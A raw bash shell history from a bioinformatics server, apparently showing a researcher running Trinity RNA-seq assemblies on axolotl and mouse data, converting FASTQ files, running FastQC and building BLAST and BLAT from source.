+tail -f nohup.out +ls +history |grep Trinity.pl +nohup /isitools/trinity/Trinity.pl --seqType fq --JM 256G -single ./single.fq.gz --CPU 60 --bflyHeapSpaceMax 2G --bflyCPU 16 --output /isiseqruns/RonAxoTrinity/trinity/singleOneLane/ & +tail -f nohup.out +ls +ls -ltr +fg +rm single.fq +nohup /isitools/trinity/Trinity.pl --seqType fq --JM 256G -single ./single.fq.gz --CPU 60 --bflyHeapSpaceMax 2G --bflyCPU 16 --output /isiseqruns/RonAxoTrinity/trinity/singleOneLane/ & +tail -f nohup.out +ls -ltr +vi concatAxoFastqFiles.sh +pwd +history |grep cp +ls +tail -f nohup.out +lss +ls +grep s_1 single.fq +tail -f nohup.out +pwd +ls +pwd +ls ../../ +cat nohup.out +pwd +man perl +pwd +ls +cat addGreaterThanSign.sh +vi addGreaterThanSign.sh +ls +rm STDOUT/ +ls +ls +../convertFastqToFasta.sh +ls +ls -ltr +cat ../convertFastqToFasta.sh +ls +ls *.fq +../convertFastqToFasta.sh +ls +cat axo_left.fa +ls +rm *.fa +ls +../convertFastqToFasta.sh +cat *.fa |more +ls +head *.fq +ls +ls +ls -ltr +cat concatAxoFastqFiles.sh +pwd +ls +ls STDOUT/ +rm STDOUT/*.fa +ls +pwd +ls +ls ../ +cat /convertFastqToFasta.sh +cat ../convertFastqToFasta.sh +ls -ltr ../ +ls -ltr +grep s_1_ *.fq +cat axo_ +cat *.fq +head *.fq |grep s_1 +cat *.fq +cat *.fq |grep s_1 +less axo_left.fq +less axo_right.fq +rm -fr *.fq +ls +pwd +vi ../concatAxoFastqFiles.sh +pwd +ls +nohup ./convertFastqToFasta.sh & +pwd +ls +less nohup.out +pwd +ls +rm nohup.out +cat concatAxoFastqFiles.sh +ls +./concatAxoFastqFiles.sh +ls STDOUT/ +head STDOUT/axo_* +ls +ls +zcat -r *.fq.gz |head -n 1 |grep s_1 +zcat -r *.fq.gz +zcat -r *.fq.gz |head |grep s_1 +zcat -r *.fq |head |grep s_1 +find . name "*.fq +find . -name "*.fq +find . -name "*.fq" +find . -name "*.fq.gz" |zcat |head -n 1 +find . -name "*.fq.gz"|head -n 1 +zcat -r *.fq |head |grep s_1 +pwd +ls +ls +ls STDOUT/ +pwd +cat convertFastqToFasta.sh +cat concatAxoFastqFilest. +cat ./concatAxoFastqFilest.sh +pwd +ls +rm STDOUT/* +nohup concatAxoFastqFiles.sh & +ls STDOUT/ +nohup ./concatAxoFastqFiles.sh & +head STDOUT/*.fq +vi concatAxoFastqFiles.sh +rm STDOUT/* +nohup concatAxoFastqFilesSingleOneLane.sh & +ls STDOUT/ +nohup ./concatAxoFastqFilesSingleOneLane.sh & +head STDOUT/*.fq +ls +vi concatAxoFastqFiles.sh +less STDOUT/*.fq +ls +ls +ls +ls -ltr +head axo_right.fq +head axo_left.fq +ls +ls -ltr +ls +ls -ltr +cat nohup.out +touch axo_* +ls -ltr +head axo_left.fq axo_right.fq +rm axo_left.fq axo_right.fq +touch axo_left.fq axo_right.fq +ls -ltr +cat ../concatAxoFastqFiles.sh +nohup concatAxoFastqFiles.sh & +nohup ./concatAxoFastqFiles.sh & +head STDOUT/axo_left.fq +ls +head ./concatAxoFastqFiles.sh +ls -ltr ../091113_Axo2PE_Eva +ls -ltr ../091113_Axo2PE_Eva/s_1_1 +zcat ../091113_Axo2PE_Eva/s_1_1 |head -n 6 +zcat ../091113_Axo2PE_Eva/s_1_1/s_1_1.fq.gz |head -n 6 +zcat ../091113_Axo2PE_Eva/s_1_1/s_1_1.fq |head -n 6 +cat ../091113_Axo2PE_Eva/s_1_1/s_1_1.fq |head -n 6 +pwd +ls +tar zcf s_1_1.fq.gz s_1_1.fq +bg +zcat ../091113_Axo2PE_Eva/s_1_1/s_1_1.fq.gz |head -n 6 +ls -ltr +zcat ./s_1_1.fq.gz |head -n 6 +fg +head s_1_1.fq +ls +ls -ltr +rm -fr s_1_1.fq.gz +ls +ls -ltr +tar zcf s_1_1.fq.gz s_1_1.fq & +zcat ./s_1_1.fq.gz |head -n 6 +fg +man gzip +ls +rm s_1_1.fq.gz +gzip -c s_1_1.fq > s_1_1.fq.gz +bg +ls -ltr +zcat ./s_1_1.fq.gz |head -n 6 +ls -ltr +history |grep zcat +ls -ltr +less s_1_1.fq +zcat s_1_1.fq.gz |head -n 4 +ls -ltr +pwd +zcat s_1_1.fq.gz |head -n 4 +pwd +find ./ -name "*.fq.gz" |zcat | head -n 1 +fg +bg +ls -ltr +ls -ltr /isiseqruns/RonAxoTrinity/091113_Axo2PE_Eva/s_1_1 +history |grep zcat +pwd +zcat ../091113_Axo2PE_Eva/s_1_1/s_1_1.fq.gz |head -n 6 +zcat ./091113_Axo2PE_Eva/s_1_1/s_1_1.fq.gz |head -n 6 +pwd +ls +ls trinity +pwd +cat AxoMikeTest/convertFastqToFasta.sh +ls +ls +rm addGreaterThanSign.sh convertFastqToFasta.sh +ls +ls mir-19/ +pwd +ls +ls -ltr +ls -ltr STDOUT/ +pwd +less nohup.out +history |grep Trinity +history |grep nohup +history |grep Trinity +history |grep Trinity.pl +ls +ls +ls +ls STDOUT/ +rm -fr STDOUT/* +pwd +ls +tail nohup.out +rm nohup.out +ls +cat convertFastqToFasta.sh +ls +cat concatAxoFastqFiles.sh +ls +ci concatAxoFastqFiles.sh +vi concatAxoFastqFiles.sh +nohup ./concatAxoFastqFiles.sh +tail nohup.out +ls +ls STDOUT/ +ls +cat ../convertFastqToFasta.sh +../convertFastqToFasta.sh +ls +ls -ltr +history |grep Trinity.pl +ls +nohup /isitools/trinity/Trinity.pl --seqType fa --JM 480G -left ./STDOUT/axo_left.fa --right ./STDOUT/axo_right.fa --CPU 60 --bflyHeapSpaceMax 1G --bflyCPU 60 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/ & +tail nohup.out +exit +ls -ltr +cat Trinity.timing i +cat Trinity.timing +tail nohup.out +ls +tail nohup.out +ls -ltr +ls +ls +ls +ls +ls +ls +ls -ltr +cat Trinity.timing +ls +ls -ltr +tail nohup.out +ls -ltr +cat Trinity.fasta |wc -l +cat ../endothelial_hq/Trinity.fasta |wc -l +cat Trinity.fasta |wc -l +head Trinity.fasta +grep path Trinity.fasta +grep path Trinity.fasta |wc -l +ls -ltr *.fa +ls -ltr +cat hs_err_pid29981.log +ls -ltr +ls +head Trinity.fasta +tail /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/nohup.out +ls -ltr +ls +du -sch mer_counts_* +ls -ltr +du -sch jellyfish.kmers.fa +pwd +pwd +ls +mount +ls +rm -fr axo_* nohup.out +nohup ./concatAxoFastqFiles.sh & +t +tail -f nohup.out +fg +ls +ls -ltr +tail -f nohup.out +history +top +pwd +pwd +ls +cat concatAxoFastqFiles.sh +ls +ls -ltr +top +ls -ltr +ls +pwd +ls +ls +ls +pwd +ls +pwd +mkdir /isiseqruns/RonAxoTrinity/trinity/mir-20 +nohup /isitools/trinity/Trinity.pl --seqType fq --JM 10G -left ./axo_left.fq.gz --right ./axo_right.fq.gz --CPU 24 --bflyHeapSpaceMax 1G --bflyCPU 16 --output /isiseqruns/RonAxoTrinity/trinity/mir-20/ & +tail -f nohup.out +ls -ltr +ls -ltr +ls -ltr +df -h +ls -ltr +ls -ltr +ls -ltr +top +ls -ltr +ls -ltr /isiseqruns/RonAxoTrinity/trinity/singleAndPairedEndTest/./axo_left.fq +ls -ltr /isiseqruns/RonAxoTrinity/trinity/singleAndPairedEndTest/./axo_left.fq +ls -ltr /isiseqruns/RonAxoTrinity/trinity/singleAndPairedEndTest/ +ps axuww |grep Trinity +ls -ltr +tail nohup.out +history |grep Trinity.pl +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fq --JM 10G -left ./axo_left.fq.gz --right ./axo_right.fq.gz --CPU 24 --bflyHeapSpaceMax 1G --bflyCPU 16 --output /isiseqruns/RonAxoTrinity/trinity/mir-20/ & +tail nohup.out +tail -f nohup.out +ls -ltr +pwd +tail nohup.out +pwd +ls -ltr ../mir-20/ +ls -ltr +ls +ls -ltr +vi concatAxoFastqFiles.sh +ls -ltr /isiseqruns/RonAxoTrinity/trinity/mir-20/ +rm -fr /isiseqruns/RonAxoTrinity/trinity/mir-20/* +[mikec@mir-20 singleAndPairedEndTest]$ singleAndPairedEndTest]$ nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fq --JM 10G -left ./axo_left.fq.gz --right ./axo_right.fq.gz --CPU 24 --bflyHeapSpaceMax 1G --bflyCPU 16 --output /isiseqruns/RonAxoTrinity/trinity/mir-20/ & +ls +history |grep Trinity.pl +ls +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fq --JM 10G -left ./axo_left.fq.gz --right ./axo_right.fq.gz --CPU 24 --bflyHeapSpaceMax 1G --bflyCPU 16 --output /isiseqruns/RonAxoTrinity/trinity/mir-20/ & +ls -ltr +tail -f nohup.out +fg +ls +ls +vi concatAxoFastqFiles.sh +cat concatAxoFastqFiles.sh +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +nohup ./concatAxoFastqFiles.sh & +fg +fg +ls +nohup ./concatAxoFastqFiles.sh & +ls -ltr +rm -fr *.fq +l -ltr +ls -ltr +ls -ltr +tail nohup.out +ls +rm -fr axo_*.gz +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +fg +ls +ls -ltr +fg +top +ls -ltr +ls -ltr +cat concatAxoFastqFiles.sh +ls +mv singleAndPairedEndTest/ singleAndPairedEndOneLaneTest +pwd +vi concatAxoFastqFiles.sh +ls -ltr +ls -ltr +history |grep Trinity.pl +mkdir /isiseqruns/RonAxoTrinity/trinity/mir-20/singleAndPairedEndOneLaneTest +ls +ls -ltr +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fq --JM 10G -left ./axo_left.fq.gz --right ./axo_right.fq.gz --CPU 24 --bflyHeapSpaceMax 1G --bflyCPU 16 --output /isiseqruns/RonAxoTrinity/trinity/mir-20/singleAndPairedEndOneLaneTest & +tail -f nohup.out +ls -ltr +ls +ls -ltr +pwd +ls -ltr ../ +ls -ltr ..// +ls -ltr ../../ +ls -ltr ../../100105_Axoset3_PE_Eva/ +ls -ltr ../../100105_Axoset3_PE_Eva/{s_1_1,s_1_1} +ls -ltr ../../100105_Axoset3_PE_Eva/{s_1_2,s_1_2} +ls -ltr ../../100105_Axoset3_PE_Eva/{s_1_3,s_1_3} +ls -ltr ../../100105_Axoset3_PE_Eva/{s_1_1,s_1_2| +ls -ltr ../../100105_Axoset3_PE_Eva/{s_1_1,s_1_2} +ls -ltr ../../100105_Axoset3_PE_Eva/{s_1_2,s_2_2} +ls -ltr ../../100105_Axoset3_PE_Eva/{s_1_1,s_2_2} +ls -ltr ../../100105_Axoset3_PE_Eva/{s_2_1,s_2_2} +ls -ltr ../../100105_Axoset3_PE_Eva/{s_2_2,s_2_2} +ls -ltr ../../100105_Axoset3_PE_Eva/{s_2_2,s_2_3} +ls -ltr ../../100105_Axoset3_PE_Eva/{s_2_2,s_3_2} +ls -ltr ../../100105_Axoset3_PE_Eva/{s_2_2,s_3_2} +ls -ltr ../../100105_Axoset3_PE_Eva/{s_3_1,s_3_2} +ls -ltr +ifconfig +/sbin/ifconfig +sudo /usr/bin/iftop -i eth5 +sudo /usr/sbin/iftop -i eth5 +/sbin/ifconfig +sudo /usr/sbin/iftop -i eth5 +ls +ls +ls +ls -ltr +tail nohup.out +tail -f nohup.out +ls -ltr +top -d 5 +pwd +tail -f nohup.out +ps axuww |grep Trinity +ps axuww |grep Trinity +ps axuww |grep java +ls -ltr +history |grep Trinity.pl +cat Trinity.timing +ls -ltr +cat failed_butterfly_commands.20258.txt +java -Xmx1G -Xms1G -jar /isitools/CentOS-5/trinityrnaseq_r2013-02-25/Butterfly/Butterfly.jar -N 44883979 -L 200 -F 500 -C /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial//chrysalis/RawComps.6/comp12242 --max_number_of_paths_per_node=4 --path_reinforcement_distance=25 --triplet-lock +bg +history |grep Trinity.pl +cat failed_butterfly_commands.20258.txt +ls -ltr +cat failed_butterfly_commands.17453.txt +ls -ltr +pwd +ls -ltr +tail failed_butterfly_commands.17622.txt +cat Trinity.timing +ls -ltr +ls -ltr chrysalis/ +du -sch chrysalis/* +java -Xmx1G -Xms2G -jar /isitools/CentOS-5/trinityrnaseq_r2013-02-25/Butterfly/Butterfly.jar -N 44883979 -L 200 -F 500 -C /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial//chrysalis/RawComps.6/comp12242 --max_number_of_paths_per_node=1 --path_reinforcement_distance=25 --triplet-lock +java -Xmx2G -Xms2G -jar /isitools/CentOS-5/trinityrnaseq_r2013-02-25/Butterfly/Butterfly.jar -N 44883979 -L 200 -F 500 -C /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial//chrysalis/RawComps.6/comp12242 --max_number_of_paths_per_node=1 --path_reinforcement_distance=25 --triplet-lock +ls -ltr +cat failed_butterfly_commands.17622.txt +date +pwd +ls +which fastQC +whcih fast +vi /isitools/.bash_profile +vi /isitools/.bash_profile +source /isitools/.bash_profile +which fastqc +exit +fastqc +pwd +ls +ls +fastqc mouse_digit_TC_0hr_raw.fq +ls +cat INSTALL.txt +ls +fastqc mouse_digit_TC_0hr_raw.fq --outdir=./fastQC_OUT/ +which perl +less /isitools/CentOS-5/perl5.16.3/lib/5.16.3/warnings.pm +vi /isitools/CentOS-5/perl5.16.3/lib/5.16.3/warnings.pm +perl -MCPAN -e shell +fastqc mouse_digit_TC_0hr_raw.fq --outdir=./fastQC_OUT/ +which perl +head /isitools/CentOS-5/perl5.16.3/lib/5.16.3/warnings.pm +fastqc mouse_digit_TC_0hr_raw.fq --outdir=./fastQC_OUT/ +perl fastqc mouse_digit_TC_0hr_raw.fq --outdir=./fastQC_OUT/ +which fastqc +vi ~/FastQC/fastqc +vi ~/FastQC/fastqc +vi ~/FastQC/fastqc +fastqc mouse_digit_TC_0hr_raw.fq --outdir=./fastQC_OUT/ +vi ~/FastQC/fastqc +locate FindBin.pm +echo $PATH +find /isitools/perl5.16.3/lib/ -name FindBind.pm +find /isitools/perl5.16.3/lib/ -name FindBin.pm +ls -ltr /isitools/perl5.16.3/lib/ +exit +pwd +ls +ls -ltr /data +top +top -d 5 +condor_status +top -d 5 +cat /etc/profile +pwd +ls -ltr +fg +ls +top +ls -ltr /isiseqruns/RonAxoTrinity/ +ls -ltr /isiseqruns/RonAxoTrinity/trinity +ls +wgetst/executables/blast+/LATEST/ncbi-blast-2.2.25+-x64-linux.tar.gz +ls +ls +wgetst/executables/blast+/LATEST/ncbi-blast-2.2.28+-x64-linux.tar.gz +tar zxf ncbi-blast-2.2.28+-x64-linux.tar.gz +ls -ltr +ls ncbi-blast-2.2.28+ +ls ncbi-blast-2.2.28+/bin/ +cp -a ncbi-blast-2.2.28+ ../ +bg +pwd +cp -a ncbi-blast-2.2.28+ /isitools/ +ls +rm -fr ncbi-blast-2.2.28+ +ls +ls -ltr +ls -ltr ncbi-blast-2.2.28+/ +ls -ltr ncbi-blast-2.2.28+/bin/ +ls -ltr +ls /isitools/ +ls +source /isitools/.bash_profile +ls -ltr +wgetsers.soe.ucsc.edu/~kent/src/blatSrc.zip +ls +mv ../blatSrc.zip . +unzip blatSrc.zip +ls +mv blatSrc ../ +rm blatSrc.zip +ls +wgetsers.soe.ucsc.edu/~kent/src/blatSrc.zip +ls +pwd +ls +ls blatSrc +ls +ls +cat README +echo $MACHTYPE +ls +mkdir bin/$MACHTYPE +pwd +ls +mkdir -p bin/$MACHTYPE +ls -ltr +ls lib/ +mkdir lib/$MACHTYPE +ls +make -j 20 +ls -ltr +ls -ltr lib/ +ls +ls -ltr +ls -ltr bin/ +ls -ltr bin/x86_64-redhat-linux-gnu/ +make -j 20 +make clean +make -j 20 +mount +ls +ls -ltr +less makefile +cat README +cat makefile +echo $MAKE +make clean +make -j 20 +pwd +vi makefile +ls -ltr +ls lib/ +ls -ltr +ls -ltr lib/ +make +grep -r jkweb.a +grep -r jkweb.a * +vi lib/makefile +make -j 20 +make clean +make -j 20 +grep -r jkweb.a * +vi lib/makefile +make clean +ls +cat makefile +make -j 20 +cat makefile +vi lib/makefile +make clean +make -j 20 +ls +ls /isitools/CentOS-5/ +ls +ls +ls +vi lib/makefile +make clean +make -j 20 +ls +ls +rm -fr blatSrc* +wgetsourceforge.net/projects/blat/files/Blat%20Full%20Version/64%20bit%20versions/blat311_64.full.zip/download +ls +unzip blat311_64.full.zip +ls +ls +ls +ls +ls +ls +rm -fr blat311* +wget +wgetsourceforge.net/projects/blat/files/Blat%20Source/Blat%20v3.1.1%20%28source%29/blat311.source.zip/download +ls +unzip blat311.source.zip +ls +ls +ls +ls +cat make +cat makefile +ls +ls ../../ +ls ../../docs/ +cat ../../docs/readme.txt +ls +make -j 20 +head make +head makefile +head -n 20 makefile +head -n 200 makefile +ls +ls +rm fr * +ls +rm -fr blat311/ +ls +wgetsers.soe.ucsc.edu/~kent/src/blatSrc35.zip +ls +unzip blatSrc35.zip +ls +ls +cat README +echo $PATH +ls +cat README +mkdir -p ~/bin/$MACHTYPE +ls lib/ +mkdir ~/lib/$MACHTYPE +ls +echo $HOME +ls +echo $HOME |ls -l +ls ~/bin +ls ~/bin/x86_64-redhat-linux-gnu/ +mkdir -p ~/lib/$MACHTYPE +ls -ltr +cat README +ls +make -j 20 +make -j 20 +ls +ls lib/ +ls -ltr +less makefile +vi makefile +ls +cat README +ls +make -j 20 clean +make -j 20 +ls +vi lib/makefile +ls +history |grep MACH +ls ~/lib/$MACHTYPE +ls ~/bin/$MACHTYPE +ls ~/$MACHTYPE +rm ~/bin/$MACHTYPE +rm -fr ~/bin/$MACHTYPE +rm -fr ~/lib/$MACHTYPE +ls +make +make clean +make +ls +vi lib/makefile +ls -ltr /isitools/CentOS-5/src/temp/blatSrc/lib +ls -ltr /isitools/CentOS-5/src/temp/blatSrc/lib/jk* +make clean +vi lib/makefile +make -j 20 +ls -ltr +ls -ltr ~/bin/$MACHTYPE +ls -ltr ~/bin/ +ls -ltr ~/lib +vi lib/makefile +make clean +ls ~/bin/ +ls -ltr ~/bin/ +rm -fr ~/bin/ +make -j 20 +make clean +vi lib/makefile +grep -r bin * +echo $HOME +ls +ls $HOME +mkdir $HOME/blat +export HOME=/isitools/CentOS-5/blat +ls $HOME +pwd +make clean +make -j 20 +vi lib/makefile +make clean +ls blat/ +make clean +make -j 20 +vi lib/makefile +make clean +make -j 20 +ls +ls blat/ +ls +ls -ltr +vi makefile +vi makefile +make clean +make all +make clean +make -j 20 all +:q +make clean +vi makefile +vi lib/makefile +make clean +ls +ls +cat README +ls +vi makefile +cat makefile +ls jkOwnLib/ +find . -name makefile +vi ./jkOwnLib/makefile +history |grep wget +ls ../src +pwd +ls ../../src +ls ../../ +ls ../../temp/ +mv ../../temp/blatSrc35.zip ../../../src/ +ls +ls +ls +pwd +ls +rm -fr blatSrc/ +ls +pwd +ls ../blatSrc35.zip +unzip ../blatSrc35.zip +ls +ls +make -j 20 +vi /isitools/CentOS-5/src/temp/blatSrc/lib/makefile +make clean +make -j 20 +ls +cat README +echo $HOME +mkdir $HOME/bin +mkdir $HOME/lib +make clean +make -j 20 +ls /isitools/CentOS-5/blat/bin/ +vi /isitools/.bash_profile +echo $HOME +w +top +ls +mount +ls +ls +mont +ls +mount +pwd +ls +ls -ltr +pwd +ls +ls blast/ +/isiseqruns/pjiang/Share/BLAST/BlastDB_hg19/ +du -sch /isiseqruns/pjiang/Share/BLAST/BlastDB_hg19/ +mkdir blast/db/ +cp -a /isiseqruns/pjiang/Share/BLAST/BlastDB_hg19 blast/db/ +bg +mkdir ../blast/db +cp -a /isiseqruns/pjiang/Share/BLAST/BlastDB_hg19 ../blast/db +bg +ls -ltr blast/db/ +ls -ltr +pwd +ls -ltr +ps auxww |grep find +sudo /etc/init.d/condor stop ; sudo chkconfig --level 2345 condor off +sudo /etc/init.d/condor stop ; sudo /sbin/chkconfig --level 2345 condor off +df -h +top +pwd +ls +pwd +ls +ls +pwd +ls +ls +ls +ls +ls -ltr +ls +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 10G --single ./mmus.endothelial.hq.fa --CPU 24 --bflyHeapSpaceMax 1G --bflyCPU 12 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial_hq/ & +ls -ltr +tail -f nohup.out +pwd +ls +ls +history |grep Trinity.pl +top +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 10G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 1G --bflyCPU 12 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +tail -f nohup.out +ls -ltr +cat failed_butterfly_commands.20258.txt ` +cat failed_butterfly_commands.20258.txt +ps auxww |grep Trinity +history |grep Trinity +pwd +ls -ltr +cat failed_butterfly_commands.20258.txt +java -Xmx1G -Xms1G -jar /isitools/CentOS-5/trinityrnaseq_r2013-02-25/Butterfly/Butterfly.jar -N 44883979 -L 200 -F 500 -C /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial//chrysalis/RawComps.6/comp12242 --max_number_of_paths_per_node=8 --path_reinforcement_distance=25 --triplet-lock +bg +ls +ld -lyt +ls -ltr +tail nohup.out +ps axuww |grep Trinity +ps axuww |grep Trinity +history |grep Trinity.pl +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 4G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 1G --bflyCPU 6 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +tail -f nohup.out +ls -ltr +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 4G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 1G --bflyCPU 2 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +tail -f nohup.out +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 1G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 1G --bflyCPU 2 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +tail -f nohup.out +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 20G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 500M --bflyCPU 2 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +ls -ltr +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 20G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 4G --bflyCPU 1 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +tail -f nohup.out +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 20G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 4G --bflyCPU 24 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +tail -f nohup.out +fg +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 2G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 4G --bflyCPU 24 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +tail -f nohup.out +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 2G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 500M --bflyCPU 24 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 2G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 4G --bflyCPU 4 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +tail -f nohup.out +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 1G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 2G --bflyCPU 2 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +tail -f nohup.out +fg +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 4G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 20G --bflyCPU 1 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +tail -f nohup.out +fg +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 4G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 20G --bflyCPU 1 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +tail -f nohup.out +fg +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 4G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 5G --bflyCPU 2 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +tail -f nohup.out +fg +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 4G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 5G --bflyCPU 4 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +tail -f nohup.out +fg +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 4G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 5G --bflyCPU 8 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +tail -f nohup.out +fg +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 4G --single ./mmus.endothelial.fa --CPU 24 --bflyHeapSpaceMax 5G --bflyCPU 8 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial/ & +tail -f nohup.out +ls +ls -ltr +cat reads.histo.tab +cat histo.1.tab +ls +ls -ltr +ls -ltr +ls +ls -ltr +pwd +ls +ls /isitools/CentOS-5/ +ls /isitools/CentOS-5/FastQC/ +ls +ls -ltr +fastqc --help +ls +ls Help/ +ls Help/1\ Introduction/ +lynx Help/1\ Introduction/1.1\ What\ is\ FastQC.html +lynx Help/1\ Introduction/1.1\ What\ is\ FastQC.html +lynx Help/2 +lynx Help/2\ Basic\ Operations/ +which perl +ls +ls perl +perl -V +./perl -V +./perl -v +exit +history |isise +history |grep isise +ls +ls +fastqc ./mouse_digit_TC_0hr_raw.fq --outdir ./fastqc_out +perl fastqc ./mouse_digit_TC_0hr_raw.fq --outdir ./fastqc_out +perl /isitools/FastQC/fastqc ./mouse_digit_TC_0hr_raw.fq --outdir ./fastqc_out +mkdir ./fastqc_out +perl /isitools/FastQC/fastqc ./mouse_digit_TC_0hr_raw.fq --outdir ./fastqc_out +ls fastqc_out/ +ls -ltr +exit +sudo chown -R ../pairedOneLane/ +sudo chown -R mikec ../pairedOneLane/ +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fq --JM 100G -left ./axo_left.fq.gz --right ./axo_left.fq.gz--CPU 24 --bflyHeapSpaceMax 2G --bflyCPU 8 --output /isiseqruns/RonAxoTrinity/trinity/pairedOneLane/ & +tail -f nohup.out +tail nohup.out +ls -ltr +vi ../convertFastqToFasta.sh +cat ../convertFastqToFasta.sh +tar zxf axo_left.fq.gz & +tar zxf axo_right.fq.gz & +fg +fg +ls +rm *.fq +ls +rm both.fa* +rm -fr chrysalis/ nohup.out Trinity.timing +ls +gunzip axo_* +ls +cat ../convertFastqToFasta.sh +perl -pe 's|@|>|;s|.*||s if $.%4==3 || $.%4==0;close $ARGV if eof' axo_right.fq > axo_right.fa & +perl -pe 's|@|>|;s|.*||s if $.%4==3 || $.%4==0;close $ARGV if eof' axo_left.fq > axo_left.fa & +ls +ls -ltr +vi ../addGreaterThanSign.sh +ps auxww |grep perl +ls -ltr +cat ../addGreaterThanSign.sh +perl -p -i -e "s/HWI-/\>HWI-/g" axo_right.fa & +perl -p -i -e "s/HWI-/\>HWI-/g" axo_left.fa & +ps axuww |grep perl +ls -lr +ls -ltr +ls -ltr +ps axuww |grep perl +ls -ltr +history |grep Trinity.pl +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 100G -left ./axo_left.fa --right ./axo_left.fa--CPU 24 --bflyHeapSpaceMax 2G --bflyCPU 8 --output /isiseqruns/RonAxoTrinity/trinity/pairedOneLane/ & +tail -f nohup.out +ls -ltr +ls -ltr +ls -ltr +ls -ltr +tail nohup.out +ls +ls -ltr +cat axo_left.fa axo_right.fa > both.fa +bg +ls -ltt +ls -ltr +ls -ltr +/isitools/CentOS-5/trinityrnaseq_r2013-02-25/trinity-plugins/jellyfish/bin/jellyfish count -t 2 -m 25 -s 14563941704 --both-strands both.fa +mv both.fa both.fasta +/isitools/CentOS-5/trinityrnaseq_r2013-02-25/trinity-plugins/jellyfish/bin/jellyfish count -t 2 -m 25 -s 14563941704 --both-strands both.fasta +mv both.fasta both.fa +ls +head both.fa +grep s_1_1 both.fa +head both.fa +vi both.fa +ls +head axo_left.fa +head axo_right.fa +vi axo_left.fa +vi axo_right.fa +cat axo_right.f +head axo*.fa +head both.fa +vi both.fa +ls +rm -fr chrysalis/ nohup.out Trinity.timing both.fa* +ls -ltr +history |grep Trinity +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 100G -left ./axo_left.fa --right ./axo_left.fa--CPU 24 --bflyHeapSpaceMax 2G --bflyCPU 8 --output /isiseqruns/RonAxoTrinity/trinity/pairedOneLane/ & +tail -f nohup.out +head both.fa +tail -f nohup.out +tail -f nohup.out +ls -ltr +pwd +ls +pwd +ls +ps axuww |grep Trinity +ls -tlr +ls -ltr +ls +ls +pws +ls +pwd +ls +top -d 5 +pwd +ls +ls +ls +ls +ls +ls -ltr +cat mouse_digit_TC_0hr_raw.fq |wc -l +head mouse_digit_TC_0hr_raw.fq +ls 